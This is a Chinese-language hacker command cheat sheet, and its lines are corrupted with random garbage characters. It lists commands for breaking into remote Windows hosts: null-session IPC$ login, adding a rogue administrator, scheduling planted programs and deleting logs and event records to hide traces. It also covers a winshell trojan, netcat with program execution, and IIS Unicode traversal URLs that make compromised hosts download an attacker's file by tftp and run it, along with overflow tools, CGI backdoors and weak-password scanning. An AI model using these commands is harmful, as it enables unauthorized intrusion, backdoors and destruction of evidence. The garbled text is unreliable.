网管和黑客都必须知道的命令
?�hS�� �n) 常用的几条NET命令:
b
"�4W`
A V$wf;v0d�( (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
'W~O����?� �}XiS:��
(以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
J}co�Wjw`q D'>yu�"�� (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
1(�Kd/%]{� .!��
LOhZ
(查看远程主机时间) net time \\IP地址
TZ��q']Z)# j"E�_nV:Qc (定时启动某个程序) at \\IP地址 02:18 readme.exe
%�cD�7}o:u 1��x]U&{do (查看共享) net view \\IP地址
IiACr�@[?e "YGs<�)S�� (查看netbios工作组列表) nbtstat -A IP地址
/0 �,#c2aq %������/H� (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
@�f�p�(uu bgd1j,PWbW (这两条把自己增加到管理员组): net user 用户名 密码 /add
��B�_[^<2_ 'Z-�jj�2t} net localgroup Administrators 用户名 /add
!V.'�~��xj �S)�GWr"m- (断开连接) net use \\IP地址\ipc$ /delete
6ZVJ2�xs[% !9i,V{$c`" 扫尾:
JQ�%`]=n(/ �iuq-�M?1� del C:\winnt\system32\logfiles\*.*
Z^AAC�KME� i`�E��s7 } del C:\winnt\ssytem32\config\*.evt
X;�T(?,��, :JqH.S�q�k del C:\winnt\system32\dtclog\*.*
,|b�<as@X ~?dPF;.�6_ del C:\winnt\system32\*.log
aU�2O5�z&� �S >uzW # del C:\winnt\system32\*.txt
Epe��TfD�� @7%nMTZ@&v del C:\winnt\*.txt
38%]�G��Q� k�@�AO�E0m del C:\winnt\*.log
�R\+p�`n�$ I`2h�xLwh+ 一、netsvc.exe
8�@!/%"Kt2 v[r�u� }/4 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
r�ZZueYuXO u�(�����?� netsvc /list \\IP地址
8p7�Uvn+m* L
�'34�2�( netsvc schedule \\IP地址 /query
o�a+R�r&t' W\zg#5f�mK netsvc \\IP地址 schedule /start
X�#(?�V[F] x<"e��} Oo 二、OpenTelnet.exe
�]]+�wDhxH :a3Pnq$]E� 远程启动主机的Telnet服务,并绑定端口到7878,例如:
��5A��/�G? }@}j�wi)l� OpenTelnet \\IP地址 用户名 密码 1 7878
y�1/$�d�n� @q�2Y�k�a 然后就可以telnet到主机的7878端口,进入DOS方式下:
:���h ��N* &-9��wU�Z telnet IP地址 7878
&&�|*GAjJ� ow
~(k5k:� 三、winshell.exe
�0W9,uC2:N ;|b
�D�@%@ 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
4�_��`+��& .-[UHO05^8 p Path (查看winshell主程序的路径信息)
'rU��
[V�+ y-{^L`%Mk� b reBoot (重新启动机器)
]E88�zWDY` ooByGQ90V: d shutDown (关闭机器)
X�#���-�U Ym-uElW�o
s Shell (执行后你就会看到可爱的“C:\>”)
.�/)A6�O*# X�f9<kbRw/ x eXit (退出本次登录会话,此命令并不终止winshell的运行)
) ��]U-7�� 1,Uv;s;�{� CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
x\!Qe\�l�E xe|o(��!�( 四、3389登陆器,GUI方式登录远程主机的
wCvtw��[6� A--Hg�-N�| 五、elsave.exe
�YQ�iTx)_� 9�~�<HT�H� 事件日志清除工具
��d> `9!) (H<�S�&�5[ elsave -s \\IP地址 -l "application" -C
�sn/^#Aa=N G1vWHa7n;f elsave -s \\IP地址 -l "system" -C
�91r#�lD�R ��myF�j�w@ elsave -s \\IP地址 -l "security" -C
Z=�
d��Ek` Txfu%'2)�e 执行后成功清除应用程序日志,系统日志,安全日志
��Zy�T9�y� �<n>Kc}��c 六、hbulot.exe
�Fl��RbGg^ +o�!��".Hp 开启win2kserver和winxp的3389服务
q.t�>:��` �=g2;��sM/ hbulot [/r]
uOE�y}&fH �"Nn/�vid; 使用/r表示安装完成后自动重起目标使设置生效。
NHUx-�IqOX G{i�}�z�^n 七、nc.exe(netcat.exe)
<u�*~RYA2 �
s6rdQ�I] 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
���r~z�-l, 1fm\5/}'`1 想要连接到某处: nc [-options] hostname port[s] [ports] ...
x;l\#x�/�< "ZNi�T�ND� 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
P(d4~���hS ^{_`��j�E 参数:
<jQ?l%���\ $VhUZGuG>� -e prog 程序重定向,一旦连接,就执行 [危险!!]
,�;'9PsIS^ }?^5\ot��u -g gateway source-routing hop point[s], up to 8
WsT�bqR)W% �?�7'uo�$� -G num source-routing pointer: 4, 8, 12, ...
�d90B15]gv 0~H(GG$VH -h 帮助信息
vL�`w���n= Ti!�j����� -i secs 延时的间隔
QSW62�]=vV �/);c�l;" -l 监听模式,用于入站连接
f:G�Zb?Wyd /���,f*IdB -n 指定数字的IP地址,不能用hostname
�DH��W;*A- ^U�ZE�dR;� -o file 记录16进制的传输
�KO�<Yc`Fs H �ZIJ�Kk( -p port 本地端口号
cn�XI�E{9M Fa�,a�)JY> -r 任意指定本地及远程端口
v-3In\T�=^ �jmmm0,#�D -s addr 本地源地址
gd��R�w��h �^TJ�n�&k -u UDP模式
YW}�q@A�Y7 KRf$V�b�uL -v 详细输出——用两个-v可得到更详细的内容
t]#y�}��V h-�=3�b��� -w secs timeout的时间
�=�da�_zy� WQ<�J<$$uu -z 将输入输出关掉——用于扫描时
{ ,/�m��Q3 八、TFTPD32.EXE
3 ~0Z.!O� a�=&�a)FR 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
GN /]��^{D ^!L'Ao�y;E http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
Ka&[
Oz<w� q%�w\U�AqA 然后可以直接令文件运行:
��3gai�jVN N�Q_�H-D\, http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
}xn\.M:ic V��{p*�N�* 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
�+ O=wKsGD F``$}]9KHD 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
�OWx��YV$� E'?yI'�~= 一、一 Xscan命令行运行参数说明:
t?�L;k+sMM 9w^1/t&=04 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
M2(+}gv;7p \]e"#"v}}_ 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
2K'3ry�)[y ^I@1y�}xi� xscan -file <主机列表文件名> <检测项目> [其他选项]
ZWQrG'$?o8 k]!Fh^�O~, 其中<检测项目> 含义如下:
r9sW:cM:e� �)d!,�,��o -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
�6e(|t2�^� �w?�d~c*4+ -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
QM=M<~<Voh d��q28Y$9~ -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
�INOw��0E[ .i>; ?(GH -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
d�k��t'~� Mf
Dna>�,Y -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
w,cfSF;=tC .8S6;x�nkC [其他选项] 含义如下:
NOLw11��9K 4�7ra�`�* -v: 显示详细扫描进度
���_�nOJ.G m{ �
.'55� -p: 跳过Ping不通的主机
(ec?_N�0�= abh='5H|^| -o: 跳过没有检测到开放端口的主机
�.�p ��NWd Fd*)1FQ�KT -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
